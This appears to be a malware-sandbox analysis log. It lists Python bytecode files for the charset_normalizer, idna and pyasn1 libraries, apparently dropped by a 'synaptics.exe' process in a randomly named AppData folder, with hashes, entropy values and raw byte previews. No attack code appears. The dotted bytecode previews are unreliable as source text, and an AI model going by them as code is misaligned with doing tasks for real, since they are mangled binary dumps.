                                                                                                                                                                                                            Preview:o..........g.........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2184
                                                                                                                                                                                                            Entropy (8bit):5.499247500077533
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:aeE81+CiqeEW5bebSh3Ue75yubxlhhLVbIf7IqJ:aG1PeEW5bebSyo5ycPzVETJ
                                                                                                                                                                                                            MD5:F2F9A3B604C330177EFC5FCCE04F9A08
                                                                                                                                                                                                            SHA1:A80372A5884DF169380881573D79491BDBC60346
                                                                                                                                                                                                            SHA-256:DBE0A36AE4924684AD27C2008651E8DE483BD22FEA2EFAC7D767B3B1D142BB0B
                                                                                                                                                                                                            SHA-512:D506CF13AB402446A39AB70B225291FCBBE2D993F5B96067D8935F85867034732AFF9A52F51DF3F3800B31B1753C8FA85EB078A180EF86CB728EB56D4B3F2C69
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gX........................@...sv...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r2d.d.l.m.Z...G.d.d...d.e...Z...d.d.d.d...Z.d.S.)......)...annotations)...TYPE_CHECKING..Any..Optional)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCE)...TypedDictc....................@...s&...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ResultDictz.Optional[str]..encoding..str..languagez.Optional[float]..confidenceN)...__name__..__module__..__qualname__..__annotations__..r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\charset_normalizer\legacy.pyr........s............r....F..byte_str..bytes..should_rename_legacy..bool..kwargsr......returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the en
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12032
                                                                                                                                                                                                            Entropy (8bit):5.193561985207815
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:3Q8lTF3s0SwVlZi2HCR6hXxmurjNgJb4oYWwNfyRh1b0jhmp3pfHZ0WWucT:LTF80NVl82HCR6hXHrjNgJbbYWjv1b0p
                                                                                                                                                                                                            MD5:9B4026E561F9569E5B1AABDACB73B0AB
                                                                                                                                                                                                            SHA1:2A78CAB613F4F58770443CEBA94EEA7CC5F8410A
                                                                                                                                                                                                            SHA-256:A6624E91744256854E414B5E8CA0182D1E2316576A75B379CE4ECEFD6772EB76
                                                                                                                                                                                                            SHA-512:67D1F41B7D6D3C54772BE44A22C753EF40A1C7E524DF1669BA9B7B66A84BAFE6E9BC752A01CB5A5AA53CACC1536611F7266411F9EC9E42BF48D13D35A8354541
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.1.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...sub)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...RE_POSSIBLE_ENCODING_INDICATION..TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z.....d>d.e.d.e.d.e.d.e.d.d.d.e.e...d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d?d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d d!....Z.e.d.e.e...f.d"d#....Z.e.d.e.f.d$d%....Z.e.d.e.f.d&d'....Z.e.d.e.f.d(d)....Z.e.d.e.f.d*d+....Z.e.d.e.f.d,d-....Z.e.d.e.f.d.d/....Z.e.d.e.d...f.d0d1....Z.e.d.e.f.d2d3....Z.e.d.e.e...f.d4d5....Z.e.d.e.e...f.d6d7....Z d@d9e.d.e.f.d:d;..Z!e.d.e.f.d<d=....Z"d.S.)A..CharsetMatchN..payload..guessed_encoding..m
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8921
                                                                                                                                                                                                            Entropy (8bit):5.469937826293192
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:bnaWk33eyNwQTpaKOvKDq2ud9KkzZYozi7WHLuo8+bHtNZo87Nf2sfGdrB6bQPTC:QHk+Dq2uNzk7yuoXbHLZDNfhGdpr4FFv
                                                                                                                                                                                                            MD5:BBCDB63CAE5060EA66D6820448A6682E
                                                                                                                                                                                                            SHA1:75239B4974C9420A3975C566AD6301F3114ACFBD
                                                                                                                                                                                                            SHA-256:7C36ABC01C2BB0EEB9A0D9B72B98C33141D6245B916690A16A34121E324DC301
                                                                                                                                                                                                            SHA-512:AC1D0DD9FA829DC68414B4052235A8C620AEDD0A266CED8ECD225AF040FDD687DBF075CECC1151447AA8E4EE17D452D4A1E332FAF1FF95D3F2BEAC6EE6038AA9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                            Entropy (8bit):5.343036326655661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/pl0/z/Oszurb63Dbm8uwkn23h/a/ArsQx6G3D8Isi:Cpl0/z/OsJ33m8pfsHQ8GT8Iv
                                                                                                                                                                                                            MD5:D3CC70BEC5BB66BCE51E29668445A0B1
                                                                                                                                                                                                            SHA1:C1761551C80ED7BCC05A719B005E480F416C63FD
                                                                                                                                                                                                            SHA-256:901C5E93799D19CC9E5FAD6C643F123B536C68C5A738934C6260929E2BFAA766
                                                                                                                                                                                                            SHA-512:B868E5443F9F75B947C7DE6033C5456D6B1B23E75D837A59BB1526911A3B3CA89ABC7EE5FB885CC50A6F419719FFB06FB558CDACA9596D05CBF04C30E21F357F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.4.0...N)...__doc__..__version__..split..VERSION..r....r.....WC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):831
                                                                                                                                                                                                            Entropy (8bit):5.12030689783824
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CNSrJBifjefr9xLGmdChEYOcAMmXkOOs28s4qUUjOs28ssqU/Wfskzx5:dijeXL/whvOcAdtOb8fcjOb89mfD
                                                                                                                                                                                                            MD5:39496ADD4D3776235A09ABDC5B1D518A
                                                                                                                                                                                                            SHA1:B2AFD4136CA212ABF7E6E9D75ED6A20FD8DBE39A
                                                                                                                                                                                                            SHA-256:3AE648B56589B2EDC375C449BCA6D351275BA36DF48136E12D3DB43A6553D9D0
                                                                                                                                                                                                            SHA-512:322965F65F078A9A23E3E3D88895855C4605A1B27C0B9855A171CAFBC03FB4EDF2E9583A34BBA35ECD051D1B45E5C0F95B365F2430D0725758356E7498B3D0B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gd........................@...st...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.S.)......)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain)...__version__).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....Z.intrangesr....Z.package_datar......__all__..r....r.....JC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\idna\__init__.py..<module>....s....P.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9650
                                                                                                                                                                                                            Entropy (8bit):5.428234763936573
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:h+aGksQkLW/SjeyH/XfQ1BRXPzxhifuy83hhX0duXCX9R3YtkjR3frrDalgRTHrM:h+vksFLW/Sj7H/XfQ1BRXPtgGyQhhEU1
                                                                                                                                                                                                            MD5:66827233E5B5542F8093C2BD31E71700
                                                                                                                                                                                                            SHA1:E459BDF9B41FCC359996AB1D5B0840CBC6B6380B
                                                                                                                                                                                                            SHA-256:B5A4BE01A471F823EC4FEBC4C666580DE00B0686C32AD8FA4025FEE8B37B70E7
                                                                                                                                                                                                            SHA-512:A14A65031F36104B69E5C30741DBC04E7959395B775F6F85FEFCEEC12C2E3B64C070CAD8219D386FE125E644CF62982B6333CB746920C29ABAD875A5AB0B51C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.3.......................@...sf...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d...Z.d.e.e.e.f...d e.d.e.f.d!d"..Z.dEd.e.d$e.d.e.f.d%d&..Z.d.e.d.e.f.d'd(..Z.d.e.d.e.f.d)d*..Z.d.e.d.d.f.d+d,..Z d.e.d-e.d.e.f.d.d/..Z!dEd.e.d-e.d0e.d.e.f.d1d2..Z"d.e.e.e.e#f...d.d.f.d3d4..Z$d.e.d.e.f.d5d6..Z%d.e.e.e.e#f...d.e.f.d7d8..Z&dFd:e.d;e.d<e.d.e.f.d=d>..Z'.#.#.#.#dGd.e.e.e.e#f...d?e.d@e.d;e.d<e.d.e.f.dAdB..Z(.#.#.#dHd.e.e.e.e#f...d?e.d@e.d;e.d.e.f.dCdD..Z)d.S.)I.....N)...Optional..Union.....)...idnadata)...intranges_contain.....s....xn--u....[....]c....................@........e.Z.d.Z.d.Z.d.S.)...IDNAErrorz5Base exception for all IDNA-encoding related problemsN....__name__..__module__..__qualname__..__doc__..r....r.....FC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\idna\core.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194427
                                                                                                                                                                                                            Entropy (8bit):3.531065831938883
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:bISwp+QvEzMUn3vDYYg/UuFD4RoC2Mo+4S+s8ecqmUM2UK+QQeky2uImLkgY88q/:bO+gEYUbYYgI
                                                                                                                                                                                                            MD5:17C26022440F91415F3D3B54AA5A3664
                                                                                                                                                                                                            SHA1:68460CC4C4E0CABC5951B140151879D848CDBE54
                                                                                                                                                                                                            SHA-256:F3B577B8FC54D5EE85EC21280829FDA47F5516473CB39DF413418B3B54D64BF0
                                                                                                                                                                                                            SHA-512:3DF2BE717DEEEC6C8B64703743C27CDCA8CC5A5AF5AEEDD3900E4AB5C0FDC3C517BAC47B90A90657090812EB2E5AC5380649F29A4898A08083CACBA0527AC15B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.1.......................@...s^\..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1963
                                                                                                                                                                                                            Entropy (8bit):5.313111871230384
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:frDo6itCRy/ORh72yzN+Rl/99X7iEvR9Bn:frc7kR2oNC/9t7jvN
                                                                                                                                                                                                            MD5:368DA43E00376CE06190E1EC054A6EB1
                                                                                                                                                                                                            SHA1:B6294FCC35777C4526E73EAE394FE43F590C4242
                                                                                                                                                                                                            SHA-256:304989BF21C0075B83B837EBA449783D72836C9C8229648810D021BDE594BFF0
                                                                                                                                                                                                            SHA-512:BDAD0A7A7F3652E80FD4E825559F656F20CA0A85ED0800D51250C7B6553F28BA0B498847E3AA0A7E4FEA57E13A0EA7323511479496CC863701707F0E87CAE000
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gj........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e...d.e.e.d.f...f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e.e.f...f.d.d...Z.d.e.d.e.e.d.f...d.e.f.d.d...Z.d.S.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c....................C...s....t.|...}.g.}.d.}.t.t.|.....D.]1}.|.d...t.|...k.r%|.|...|.|.d.....d...k.r%q.|.|.d...|.d.......}.|...t.|.d...|.d...d.........|.}.q.t.|...S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. ..........r....)...sorted..range..len..append.._e
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                            Entropy (8bit):4.91390070140503
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/TTAl/uletxbkCohtt/lPlAPt+kiE2J5dj/a6iVWrzSBw5JOmIOt2TgN:y/gqetGCohrMwkn23h/a/ArmBw5Amptz
                                                                                                                                                                                                            MD5:97404EF4B7360EF2AD9AB3E33A887662
                                                                                                                                                                                                            SHA1:CC85077BF120D6B7D513164A47FE7335DAEA4178
                                                                                                                                                                                                            SHA-256:0E35173FA2BB14C5E9D057D004F1884C64816C24E818B46F922CD43F572E9E41
                                                                                                                                                                                                            SHA-512:B4AEE8D67FAD4952B8920CC1FDC66CB8255D134BF89B4F7022E992DCD24D9909439F6893725EF6747C3B59D91D43EB0C0EB02A2F91A8A705E2CAC18E97101A07
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.S.).z.3.10N)...__version__..r....r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\idna\package_data.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                            Entropy (8bit):4.915805429343129
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/Pv8uletxbkCoJ1tt/lPlK5jAut+kiE2J5dj/a6iVWrzL1dM4LkcTgM:y/38qetGCoJ1rq+uwkn23h/a/Ardnt
                                                                                                                                                                                                            MD5:FE0897FBAA956DCB5A9D8B9836D8E11A
                                                                                                                                                                                                            SHA1:E6A4F480A7AE8676D2304473249B72E5DD404DAB
                                                                                                                                                                                                            SHA-256:9ABF4E8594217B65230B2E2AE3FAAC1A9898937D23DEA767EB45511C95FCF221
                                                                                                                                                                                                            SHA-512:415C8ADCF974E269E6479855AE7341C95F7FC2EFE90D6DEFDB5D8F8894FD47DE9398676A3EC6DC08B35A663725E5B4F85D03AC587DFBC899C69BE4A8EB89E83C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gB........................@...s....d.Z.d.S.).z.0.6.1N)...__version__..r....r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4134
                                                                                                                                                                                                            Entropy (8bit):4.998095889605159
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:xoE//QELK0E+xQk5QMwJ9v9YitXwqiOEsRuUOGnBiw:xHm0XQ1MwzOOFRTBp
                                                                                                                                                                                                            MD5:ED130BC549B9A6EB95239004A30315F0
                                                                                                                                                                                                            SHA1:7FAC9FEFE16BD9AF6D2B0B3E552D76598B066361
                                                                                                                                                                                                            SHA-256:153290F88D46C3F3203B5E03636DBAF02288CB6F432CD8315E9C8643D2B8BD80
                                                                                                                                                                                                            SHA-512:72180CDC20690E333B41CD631ED9D306EF804C4ACA71A872C2AB855BFB281268D6C33EA5D8D32D32AA9A216DAAC46C1567126770E2897E009BF7539B03312B43
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.e.e.e.e.d...Z.i.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.a.d.d...Z.d.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.S.)......N)...__version__)...error)...Debug..setLogger..hexdump..........i....)...none..encoder..decoder..allc....................@...s&...e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.)...PrinterNc....................C...sj...|.d.u.r.t...d...}.|...t.j.....|.d.u.r.t.....}.|.d.u.r t...d...}.|...|.....|...t.j.....|...|.....|.|._.d.S.).N..pyasn1z!%(asctime)s %(name)s: %(message)s)...logging..getLogger..setLevel..DEBUG..StreamHandler..Formatter..setFormatter..addHandler.._Printer__logger)...self..logger..handler..formatter..r.....IC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\debug.py..__init__ ...s..........................z.Printer.__init__c....................C........|.j...|.....d.S...N).r......debug..r......msgr....r....r......__call__2..........z.Printer.__ca
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4103
                                                                                                                                                                                                            Entropy (8bit):4.988892016690328
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Bce+V9bNrz9XBMXG8oD78Or+3rDWXId4d32NxjbiuipJ:3qZB9GWKOr+3eId632TjbriH
                                                                                                                                                                                                            MD5:F3CEF834A310016912CDF6A6AC791D38
                                                                                                                                                                                                            SHA1:112383429DEF86F5D9ED4254EDC83EB3ABA4ABD1
                                                                                                                                                                                                            SHA-256:FA4B4E588F10E47EF484F836FE301CF71577B0EFC5BBB21651ACD78843E09C07
                                                                                                                                                                                                            SHA-512:3A12292B57AC8D12A6082C0A24DCB8024E9A654CAA750160689C683668A8A438B290056BDB2AFADE2C0E904DA9B53D455E9A9FFAD3B7BF4D041BE5E48FA0CA25
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e.e...Z.d.S.).c....................@...s$...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.d.S.)...PyAsn1ErroraB...Base pyasn1 exception.. `PyAsn1Error` is the base exception class (based on. :class:`Exception`) that represents all possible ASN.1 related. errors... Parameters. ----------. args:. Opaque positional parameters.. Keyword Args. ------------. kwargs:. Opaque keyword parameters.. c....................O...s....|.|._.|.|._.d.S...N)..._args.._kwargs)...self..args..kwargs..r.....IC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\error.py..__init__....s........z.PyAsn1Error.__init__c....................C...s....|.j...d.i...S.).a7...Return exception context.. When exception object is created, the caller can supply some opaque. context for the upper layers
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):175
                                                                                                                                                                                                            Entropy (8bit):4.660203246760014
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWe3It+kiE2J5dj/a6iVWrzL1A67kcTgp:y/3KCqeh/w7Iwkn23h/a/ArdA6x4
                                                                                                                                                                                                            MD5:986E0FD08B2D69BACA772EDBF2D38B66
                                                                                                                                                                                                            SHA1:10510567B2B5843860EAECAD5E28A0F6B50B3068
                                                                                                                                                                                                            SHA-256:6A62852F8B60B081882DBA7D6F18B5CF8C90353C0C121E03916BA5874925EEE9
                                                                                                                                                                                                            SHA-512:CB034DF55B0F6AD283C698D7E065EF64A75356539D33DCE9CF84F26D9E6C889ECE01875940B542B1BD59340F4FA3423D7AFD697ED114A586AD945C8AD7BE30F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5836
                                                                                                                                                                                                            Entropy (8bit):5.282456829331137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:W+ZlQBEsXLK7LEQ8yjdQBblCEdS1azu5VZ6qMwxqNo+dTqVSM5LleeVOpRfYyU6W:3LrZ+jCr1azunZNMLoeTsH5LlL6RfYTv
                                                                                                                                                                                                            MD5:5AD5B3DD76C44AFD7A55B669A5E09056
                                                                                                                                                                                                            SHA1:FE086D34A157CD3097A153E567860F6BD4822FE0
                                                                                                                                                                                                            SHA-256:B9C144EF0AA4714FB8A8222CFF8405B2CA8226E3344BCD445B49E2C321D013BD
                                                                                                                                                                                                            SHA-512:5AD1E004173F8263C74C724276072ECD0670067F240468587EF0713FE5730C8FC10076C645BD7E94120E132446DF02BA6C6E6153C79013FF25D362F4140524FA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
